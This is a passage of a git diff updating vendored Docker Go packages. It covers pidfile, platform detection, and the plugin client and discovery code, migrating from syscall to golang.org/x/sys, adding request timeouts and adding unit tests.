-package parsers +package parsers // import "github.com/docker/docker/pkg/parsers" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go index 7f19e90279..a70093f1c4 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go +++ b/vendor/github.com/docker/docker/pkg/parsers/parsers_test.go @@ -1,4 +1,4 @@ -package parsers +package parsers // import "github.com/docker/docker/pkg/parsers" import ( "reflect" diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go index d832fea7a2..0617a89e5f 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile.go @@ -1,7 +1,7 @@ // Package pidfile provides structure and helper functions to create and remove // PID file. A PID file is usually a file used to store the process ID of a // running process. -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( "fmt" @@ -37,7 +37,7 @@ func New(path string) (*PIDFile, error) { return nil, err } // Note MkdirAll returns nil if a directory already exists - if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755)); err != nil { + if err := system.MkdirAll(filepath.Dir(path), os.FileMode(0755), ""); err != nil { return nil, err } if err := ioutil.WriteFile(path, []byte(fmt.Sprintf("%d", os.Getpid())), 0644); err != nil { @@ -49,8 +49,5 @@ func New(path string) (*PIDFile, error) { // Remove removes the PIDFile. 
func (file PIDFile) Remove() error { - if err := os.Remove(file.path); err != nil { - return err - } - return nil + return os.Remove(file.path) } diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go index 5c1cd7ab85..92746aa7bf 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go @@ -1,18 +1,14 @@ // +build darwin -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( - "syscall" + "golang.org/x/sys/unix" ) func processExists(pid int) bool { // OS X does not have a proc filesystem. // Use kill -0 pid to judge if the process exists. - err := syscall.Kill(pid, 0) - if err != nil { - return false - } - - return true + err := unix.Kill(pid, 0) + return err == nil } diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go index 73e8af76db..cd9878e1e4 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go @@ -1,4 +1,4 @@ -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go index 1bf5221e3b..cc6696d211 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go +++ b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go @@ -1,6 +1,6 @@ // +build !windows,!darwin -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go index ae489c627a..1c5e6cb654 100644 --- a/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go +++ 
b/vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go @@ -1,6 +1,8 @@ -package pidfile +package pidfile // import "github.com/docker/docker/pkg/pidfile" -import "syscall" +import ( + "golang.org/x/sys/windows" +) const ( processQueryLimitedInformation = 0x1000 @@ -9,13 +11,13 @@ const ( ) func processExists(pid int) bool { - h, err := syscall.OpenProcess(processQueryLimitedInformation, false, uint32(pid)) + h, err := windows.OpenProcess(processQueryLimitedInformation, false, uint32(pid)) if err != nil { return false } var c uint32 - err = syscall.GetExitCodeProcess(h, &c) - syscall.Close(h) + err = windows.GetExitCodeProcess(h, &c) + windows.Close(h) if err != nil { return c == stillActive } diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go index 2cdc2c5918..a260a23f4f 100644 --- a/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_linux.go @@ -1,16 +1,18 @@ // Package platform provides helper function to get the runtime architecture // for different platforms. 
-package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( - "syscall" + "bytes" + + "golang.org/x/sys/unix" ) // runtimeArchitecture gets the name of the current architecture (x86, x86_64, …) func runtimeArchitecture() (string, error) { - utsname := &syscall.Utsname{} - if err := syscall.Uname(utsname); err != nil { + utsname := &unix.Utsname{} + if err := unix.Uname(utsname); err != nil { return "", err } - return charsToString(utsname.Machine), nil + return string(utsname.Machine[:bytes.IndexByte(utsname.Machine[:], 0)]), nil } diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go index 45bbcf1535..d51f68698f 100644 --- a/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_unix.go @@ -1,8 +1,8 @@ -// +build freebsd solaris darwin +// +build freebsd darwin // Package platform provides helper function to get the runtime architecture // for different platforms. 
-package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( "os/exec" diff --git a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go index c5f684ddfa..a25f1bc516 100644 --- a/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go +++ b/vendor/github.com/docker/docker/pkg/platform/architecture_windows.go @@ -1,4 +1,4 @@ -package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/platform/platform.go b/vendor/github.com/docker/docker/pkg/platform/platform.go index e4b03122f4..f6b02b734a 100644 --- a/vendor/github.com/docker/docker/pkg/platform/platform.go +++ b/vendor/github.com/docker/docker/pkg/platform/platform.go @@ -1,9 +1,9 @@ -package platform +package platform // import "github.com/docker/docker/pkg/platform" import ( "runtime" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) var ( diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go deleted file mode 100644 index 5dcbadfdfe..0000000000 --- a/vendor/github.com/docker/docker/pkg/platform/utsname_int8.go +++ /dev/null @@ -1,18 +0,0 @@ -// +build linux,386 linux,amd64 linux,arm64 -// see golang's sources src/syscall/ztypes_linux_*.go that use int8 - -package platform - -// Convert the OS/ARCH-specific utsname.Machine to string -// given as an array of signed int8 -func charsToString(ca [65]int8) string { - s := make([]byte, len(ca)) - var lens int - for ; lens < len(ca); lens++ { - if ca[lens] == 0 { - break - } - s[lens] = uint8(ca[lens]) - } - return string(s[0:lens]) -} diff --git a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go b/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go deleted file mode 100644 index c9875cf6e6..0000000000 --- 
a/vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go +++ /dev/null @@ -1,18 +0,0 @@ -// +build linux,arm linux,ppc64 linux,ppc64le s390x -// see golang's sources src/syscall/ztypes_linux_*.go that use uint8 - -package platform - -// Convert the OS/ARCH-specific utsname.Machine to string -// given as an array of unsigned uint8 -func charsToString(ca [65]uint8) string { - s := make([]byte, len(ca)) - var lens int - for ; lens < len(ca); lens++ { - if ca[lens] == 0 { - break - } - s[lens] = ca[lens] - } - return string(s[0:lens]) -} diff --git a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go index dde5f66035..370e0d5b97 100644 --- a/vendor/github.com/docker/docker/pkg/plugingetter/getter.go +++ b/vendor/github.com/docker/docker/pkg/plugingetter/getter.go @@ -1,22 +1,39 @@ -package plugingetter +package plugingetter // import "github.com/docker/docker/pkg/plugingetter" -import "github.com/docker/docker/pkg/plugins" +import ( + "net" + "time" + + "github.com/docker/docker/pkg/plugins" +) const ( - // LOOKUP doesn't update RefCount - LOOKUP = 0 - // ACQUIRE increments RefCount - ACQUIRE = 1 - // RELEASE decrements RefCount - RELEASE = -1 + // Lookup doesn't update RefCount + Lookup = 0 + // Acquire increments RefCount + Acquire = 1 + // Release decrements RefCount + Release = -1 ) -// CompatPlugin is a abstraction to handle both v2(new) and v1(legacy) plugins. +// CompatPlugin is an abstraction to handle both v2(new) and v1(legacy) plugins. 
type CompatPlugin interface { - Client() *plugins.Client Name() string - BasePath() string + ScopedPath(string) string IsV1() bool + PluginWithV1Client +} + +// PluginWithV1Client is a plugin that directly utilizes the v1/http plugin client +type PluginWithV1Client interface { + Client() *plugins.Client +} + +// PluginAddr is a plugin that exposes the socket address for creating custom clients rather than the built-in `*plugins.Client` +type PluginAddr interface { + Addr() net.Addr + Timeout() time.Duration + Protocol() string } // CountedPlugin is a plugin which is reference counted. diff --git a/vendor/github.com/docker/docker/pkg/plugins/client.go b/vendor/github.com/docker/docker/pkg/plugins/client.go index e8e730eb58..0353305358 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/client.go +++ b/vendor/github.com/docker/docker/pkg/plugins/client.go @@ -1,7 +1,8 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "bytes" + "context" "encoding/json" "io" "io/ioutil" @@ -9,10 +10,11 @@ import ( "net/url" "time" - "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/plugins/transport" "github.com/docker/go-connections/sockets" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" ) const ( @@ -57,20 +59,20 @@ func NewClient(addr string, tlsConfig *tlsconfig.Options) (*Client, error) { } // NewClientWithTimeout creates a new plugin client (http). 
-func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeoutInSecs int) (*Client, error) { +func NewClientWithTimeout(addr string, tlsConfig *tlsconfig.Options, timeout time.Duration) (*Client, error) { clientTransport, err := newTransport(addr, tlsConfig) if err != nil { return nil, err } - return newClientWithTransport(clientTransport, timeoutInSecs), nil + return newClientWithTransport(clientTransport, timeout), nil } // newClientWithTransport creates a new plugin client with a given transport. -func newClientWithTransport(tr transport.Transport, timeoutInSecs int) *Client { +func newClientWithTransport(tr transport.Transport, timeout time.Duration) *Client { return &Client{ http: &http.Client{ Transport: tr, - Timeout: time.Duration(timeoutInSecs) * time.Second, + Timeout: timeout, }, requestFactory: tr, } @@ -82,16 +84,33 @@ type Client struct { requestFactory transport.RequestFactory } +// RequestOpts is the set of options that can be passed into a request +type RequestOpts struct { + Timeout time.Duration +} + +// WithRequestTimeout sets a timeout duration for plugin requests +func WithRequestTimeout(t time.Duration) func(*RequestOpts) { + return func(o *RequestOpts) { + o.Timeout = t + } +} + // Call calls the specified method with the specified arguments for the plugin. // It will retry for 30 seconds if a failure occurs when calling. 
-func (c *Client) Call(serviceMethod string, args interface{}, ret interface{}) error { +func (c *Client) Call(serviceMethod string, args, ret interface{}) error { + return c.CallWithOptions(serviceMethod, args, ret) +} + +// CallWithOptions is just like call except it takes options +func (c *Client) CallWithOptions(serviceMethod string, args interface{}, ret interface{}, opts ...func(*RequestOpts)) error { var buf bytes.Buffer if args != nil { if err := json.NewEncoder(&buf).Encode(args); err != nil { return err } } - body, err := c.callWithRetry(serviceMethod, &buf, true) + body, err := c.callWithRetry(serviceMethod, &buf, true, opts...) if err != nil { return err } @@ -128,18 +147,31 @@ func (c *Client) SendFile(serviceMethod string, data io.Reader, ret interface{}) return nil } -func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) (io.ReadCloser, error) { - req, err := c.requestFactory.NewRequest(serviceMethod, data) - if err != nil { - return nil, err - } - +func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool, reqOpts ...func(*RequestOpts)) (io.ReadCloser, error) { var retries int start := time.Now() + var opts RequestOpts + for _, o := range reqOpts { + o(&opts) + } + for { + req, err := c.requestFactory.NewRequest(serviceMethod, data) + if err != nil { + return nil, err + } + + cancelRequest := func() {} + if opts.Timeout > 0 { + var ctx context.Context + ctx, cancelRequest = context.WithTimeout(req.Context(), opts.Timeout) + req = req.WithContext(ctx) + } + resp, err := c.http.Do(req) if err != nil { + cancelRequest() if !retry { return nil, err } @@ -157,6 +189,7 @@ func (c *Client) callWithRetry(serviceMethod string, data io.Reader, retry bool) if resp.StatusCode != http.StatusOK { b, err := ioutil.ReadAll(resp.Body) resp.Body.Close() + cancelRequest() if err != nil { return nil, &statusError{resp.StatusCode, serviceMethod, err.Error()} } @@ -176,7 +209,11 @@ func (c *Client) 
callWithRetry(serviceMethod string, data io.Reader, retry bool) // old way... return nil, &statusError{resp.StatusCode, serviceMethod, string(b)} } - return resp.Body, nil + return ioutils.NewReadCloserWrapper(resp.Body, func() error { + err := resp.Body.Close() + cancelRequest() + return err + }), nil } } diff --git a/vendor/github.com/docker/docker/pkg/plugins/client_test.go b/vendor/github.com/docker/docker/pkg/plugins/client_test.go index 9faad86a15..c3a4892272 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/client_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/client_test.go @@ -1,16 +1,22 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( + "bytes" + "context" + "encoding/json" "io" "net/http" "net/http/httptest" "net/url" - "reflect" + "strings" "testing" "time" "github.com/docker/docker/pkg/plugins/transport" "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -38,6 +44,26 @@ func TestFailedConnection(t *testing.T) { } } +func TestFailOnce(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + failed := false + mux.HandleFunc("/Test.FailOnce", func(w http.ResponseWriter, r *http.Request) { + if !failed { + failed = true + panic("Plugin not ready") + } + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + b := strings.NewReader("body") + _, err := c.callWithRetry("Test.FailOnce", b, true) + if err != nil { + t.Fatal(err) + } +} + func TestEchoInputOutput(t *testing.T) { addr := setupRemotePluginServer() defer teardownRemotePluginServer() @@ -62,9 +88,7 @@ func TestEchoInputOutput(t *testing.T) { t.Fatal(err) } - if !reflect.DeepEqual(output, m) { - t.Fatalf("Expected %v, was %v\n", m, output) - } + assert.Check(t, is.DeepEqual(m, output)) err = c.Call("Test.Echo", nil, nil) if err != nil { t.Fatal(err) @@ -132,3 +156,122 @@ func TestClientScheme(t 
*testing.T) { } } } + +func TestNewClientWithTimeout(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + time.Sleep(time.Duration(600) * time.Millisecond) + io.Copy(w, r.Body) + }) + + // setting timeout of 500ms + timeout := time.Duration(500) * time.Millisecond + c, _ := NewClientWithTimeout(addr, &tlsconfig.Options{InsecureSkipVerify: true}, timeout) + var output Manifest + err := c.Call("Test.Echo", m, &output) + if err == nil { + t.Fatal("Expected timeout error") + } +} + +func TestClientStream(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + var output Manifest + + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s", r.Method) + } + + header := w.Header() + header.Set("Content-Type", transport.VersionMimetype) + + io.Copy(w, r.Body) + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + body, err := c.Stream("Test.Echo", m) + if err != nil { + t.Fatal(err) + } + defer body.Close() + if err := json.NewDecoder(body).Decode(&output); err != nil { + t.Fatalf("Test.Echo: error reading plugin resp: %v", err) + } + assert.Check(t, is.DeepEqual(m, output)) +} + +func TestClientSendFile(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}} + var output Manifest + var buf bytes.Buffer + if err := json.NewEncoder(&buf).Encode(m); err != nil { + t.Fatal(err) + } + mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s\n", r.Method) + } + + header := w.Header() + header.Set("Content-Type", 
transport.VersionMimetype) + + io.Copy(w, r.Body) + }) + + c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true}) + if err := c.SendFile("Test.Echo", &buf, &output); err != nil { + t.Fatal(err) + } + assert.Check(t, is.DeepEqual(m, output)) +} + +func TestClientWithRequestTimeout(t *testing.T) { + timeout := 1 * time.Millisecond + testHandler := func(w http.ResponseWriter, r *http.Request) { + time.Sleep(timeout + 1*time.Millisecond) + w.WriteHeader(http.StatusOK) + } + + srv := httptest.NewServer(http.HandlerFunc(testHandler)) + defer srv.Close() + + client := &Client{http: srv.Client(), requestFactory: &testRequestWrapper{srv}} + _, err := client.callWithRetry("/Plugin.Hello", nil, false, WithRequestTimeout(timeout)) + assert.Assert(t, is.ErrorContains(err, ""), "expected error") + + err = errors.Cause(err) + + switch e := err.(type) { + case *url.Error: + err = e.Err + } + assert.DeepEqual(t, context.DeadlineExceeded, err) +} + +type testRequestWrapper struct { + *httptest.Server +} + +func (w *testRequestWrapper) NewRequest(path string, data io.Reader) (*http.Request, error) { + req, err := http.NewRequest("POST", path, data) + if err != nil { + return nil, err + } + u, err := url.Parse(w.Server.URL) + if err != nil { + return nil, err + } + req.URL = u + return req, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery.go b/vendor/github.com/docker/docker/pkg/plugins/discovery.go index e99581c573..4b79bd29ad 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery.go @@ -1,8 +1,7 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "encoding/json" - "errors" "fmt" "io/ioutil" "net/url" @@ -10,6 +9,8 @@ import ( "path/filepath" "strings" "sync" + + "github.com/pkg/errors" ) var ( @@ -28,30 +29,52 @@ func newLocalRegistry() localRegistry { // Scan scans all the plugin paths and returns all the names it found func 
Scan() ([]string, error) { var names []string - if err := filepath.Walk(socketsPath, func(path string, fi os.FileInfo, err error) error { - if err != nil { - return nil + dirEntries, err := ioutil.ReadDir(socketsPath) + if err != nil && !os.IsNotExist(err) { + return nil, errors.Wrap(err, "error reading dir entries") + } + + for _, fi := range dirEntries { + if fi.IsDir() { + fi, err = os.Stat(filepath.Join(socketsPath, fi.Name(), fi.Name()+".sock")) + if err != nil { + continue + } } if fi.Mode()&os.ModeSocket != 0 { - name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) - names = append(names, name) + names = append(names, strings.TrimSuffix(filepath.Base(fi.Name()), filepath.Ext(fi.Name()))) } - return nil - }); err != nil { - return nil, err } - for _, path := range specsPaths { - if err := filepath.Walk(path, func(p string, fi os.FileInfo, err error) error { - if err != nil || fi.IsDir() { - return nil + for _, p := range specsPaths { + dirEntries, err := ioutil.ReadDir(p) + if err != nil && !os.IsNotExist(err) { + return nil, errors.Wrap(err, "error reading dir entries") + } + + for _, fi := range dirEntries { + if fi.IsDir() { + infos, err := ioutil.ReadDir(filepath.Join(p, fi.Name())) + if err != nil { + continue + } + + for _, info := range infos { + if strings.TrimSuffix(info.Name(), filepath.Ext(info.Name())) == fi.Name() { + fi = info + break + } + } + } + + ext := filepath.Ext(fi.Name()) + switch ext { + case ".spec", ".json": + plugin := strings.TrimSuffix(fi.Name(), ext) + names = append(names, plugin) + default: } - name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) - names = append(names, name) - return nil - }); err != nil { - return nil, err } } return names, nil @@ -81,7 +104,7 @@ func (l *localRegistry) Plugin(name string) (*Plugin, error) { return readPluginInfo(name, p) } } - return nil, ErrNotFound + return nil, errors.Wrapf(ErrNotFound, "could not find plugin %s in v1 plugin registry", name) } func readPluginInfo(name, 
path string) (*Plugin, error) { diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go index 03f9d00319..28fda41bad 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go @@ -1,4 +1,4 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "io/ioutil" @@ -66,7 +66,7 @@ func TestFileSpecPlugin(t *testing.T) { t.Fatalf("Expected plugin addr `%s`, got %s\n", c.addr, p.Addr) } - if p.TLSConfig.InsecureSkipVerify != true { + if !p.TLSConfig.InsecureSkipVerify { t.Fatalf("Expected TLS verification to be skipped") } } diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go index 693a47e394..58058f2828 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go @@ -1,5 +1,5 @@ // +build !windows -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" var specsPaths = []string{"/etc/docker/plugins", "/usr/lib/docker/plugins"} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go index 3e2d506b97..b4aefc83e4 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go @@ -1,14 +1,17 @@ // +build !windows -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "fmt" + "io/ioutil" "net" "os" "path/filepath" "reflect" "testing" + + "gotest.tools/assert" ) func TestLocalSocket(t *testing.T) { @@ -53,9 +56,104 @@ func TestLocalSocket(t *testing.T) { if p.Addr != addr { t.Fatalf("Expected plugin addr `%s`, got %s\n", addr, p.Addr) } - if 
p.TLSConfig.InsecureSkipVerify != true { + if !p.TLSConfig.InsecureSkipVerify { t.Fatalf("Expected TLS verification to be skipped") } l.Close() } } + +func TestScan(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + pluginNames, err := Scan() + if err != nil { + t.Fatal(err) + } + if pluginNames != nil { + t.Fatal("Plugin names should be empty.") + } + + path := filepath.Join(tmpdir, "echo.spec") + addr := "unix://var/lib/docker/plugins/echo.sock" + name := "echo" + + err = os.MkdirAll(filepath.Dir(path), 0755) + if err != nil { + t.Fatal(err) + } + + err = ioutil.WriteFile(path, []byte(addr), 0644) + if err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + p, err := r.Plugin(name) + assert.NilError(t, err) + + pluginNamesNotEmpty, err := Scan() + if err != nil { + t.Fatal(err) + } + if len(pluginNamesNotEmpty) != 1 { + t.Fatalf("expected 1 plugin entry: %v", pluginNamesNotEmpty) + } + if p.Name() != pluginNamesNotEmpty[0] { + t.Fatalf("Unable to scan plugin with name %s", p.name) + } +} + +func TestScanNotPlugins(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + // not that `Setup()` above sets the sockets path and spec path dirs, which + // `Scan()` uses to find plugins to the returned `tmpdir` + + notPlugin := filepath.Join(tmpdir, "not-a-plugin") + if err := os.MkdirAll(notPlugin, 0700); err != nil { + t.Fatal(err) + } + + // this is named differently than the dir it's in, so the scanner should ignore it + l, err := net.Listen("unix", filepath.Join(notPlugin, "foo.sock")) + if err != nil { + t.Fatal(err) + } + defer l.Close() + + // same let's test a spec path + f, err := os.Create(filepath.Join(notPlugin, "foo.spec")) + if err != nil { + t.Fatal(err) + } + defer f.Close() + + names, err := Scan() + if err != nil { + t.Fatal(err) + } + if len(names) != 0 { + t.Fatalf("expected no plugins, got %v", names) + } + + // Just as a sanity check, let's make an entry that the scanner should read + f, err = 
os.Create(filepath.Join(notPlugin, "not-a-plugin.spec")) + if err != nil { + t.Fatal(err) + } + defer f.Close() + + names, err = Scan() + if err != nil { + t.Fatal(err) + } + if len(names) != 1 { + t.Fatalf("expected 1 entry in result: %v", names) + } + if names[0] != "not-a-plugin" { + t.Fatalf("expected plugin named `not-a-plugin`, got: %s", names[0]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go index d7c1fe4942..f0af3477f4 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go @@ -1,4 +1,4 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/plugins/errors.go b/vendor/github.com/docker/docker/pkg/plugins/errors.go index 7988471026..6735c304bf 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/errors.go +++ b/vendor/github.com/docker/docker/pkg/plugins/errors.go @@ -1,4 +1,4 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go index b19c0d52f1..ce98078f87 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go +++ b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go @@ -1,12 +1,26 @@ -package plugins +package plugins // import "github.com/docker/docker/pkg/plugins" import ( - "errors" + "bytes" + "encoding/json" + "io" + "io/ioutil" + "net/http" "path/filepath" "runtime" "sync" "testing" "time" + + "github.com/docker/docker/pkg/plugins/transport" + "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +const ( + fruitPlugin = "fruit" + fruitImplements = "apple" ) // regression test for deadlock in handlers @@ -40,5 
+54,101 @@ func testActive(t *testing.T, p *Plugin) { t.Fatalf("%s:%d: deadlock in waitActive", filepath.Base(f), l) case <-done: } +} + +func TestGet(t *testing.T) { + p := &Plugin{name: fruitPlugin, activateWait: sync.NewCond(&sync.Mutex{})} + p.Manifest = &Manifest{Implements: []string{fruitImplements}} + storage.plugins[fruitPlugin] = p + + plugin, err := Get(fruitPlugin, fruitImplements) + if err != nil { + t.Fatal(err) + } + if p.Name() != plugin.Name() { + t.Fatalf("No matching plugin with name %s found", plugin.Name()) + } + if plugin.Client() != nil { + t.Fatal("expected nil Client but found one") + } + if !plugin.IsV1() { + t.Fatal("Expected true for V1 plugin") + } + + // check negative case where plugin fruit doesn't implement banana + _, err = Get("fruit", "banana") + assert.Equal(t, errors.Cause(err), ErrNotImplements) + + // check negative case where plugin vegetable doesn't exist + _, err = Get("vegetable", "potato") + assert.Equal(t, errors.Cause(err), ErrNotFound) +} + +func TestPluginWithNoManifest(t *testing.T) { + addr := setupRemotePluginServer() + defer teardownRemotePluginServer() + + m := Manifest{[]string{fruitImplements}} + var buf bytes.Buffer + if err := json.NewEncoder(&buf).Encode(m); err != nil { + t.Fatal(err) + } + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + if r.Method != "POST" { + t.Fatalf("Expected POST, got %s\n", r.Method) + } + header := w.Header() + header.Set("Content-Type", transport.VersionMimetype) + + io.Copy(w, &buf) + }) + + p := &Plugin{ + name: fruitPlugin, + activateWait: sync.NewCond(&sync.Mutex{}), + Addr: addr, + TLSConfig: &tlsconfig.Options{InsecureSkipVerify: true}, + } + storage.plugins[fruitPlugin] = p + + plugin, err := Get(fruitPlugin, fruitImplements) + if err != nil { + t.Fatal(err) + } + if p.Name() != plugin.Name() { + t.Fatalf("No matching plugin with name %s found", plugin.Name()) + } +} + +func TestGetAll(t *testing.T) { + tmpdir, unregister := Setup(t) + 
defer unregister() + + p := filepath.Join(tmpdir, "example.json") + spec := `{ + "Name": "example", + "Addr": "https://example.com/docker/plugin" +}` + + if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + plugin, err := r.Plugin("example") + if err != nil { + t.Fatal(err) + } + plugin.Manifest = &Manifest{Implements: []string{"apple"}} + storage.plugins["example"] = plugin + + fetchedPlugins, err := GetAll("apple") + if err != nil { + t.Fatal(err) + } + if fetchedPlugins[0].Name() != plugin.Name() { + t.Fatalf("Expected to get plugin with name %s", plugin.Name()) + } } diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md index 0418a3e00a..5f6a421f19 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md @@ -30,7 +30,7 @@ Where: - `--type` is the name of the interface to use - `--name` is the subsystem that the plugin "Implements" - `-i` is the input file containing the interface definition -- `-o` is the output file where the the generated code should go +- `-o` is the output file where the generated code should go **Note**: The generated code will use the same package name as the one defined in the input file diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go index 5695dcc2d4..d27e28ebef 100644 --- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go @@ -1,17 +1,11 @@ -package foo +package foo // import 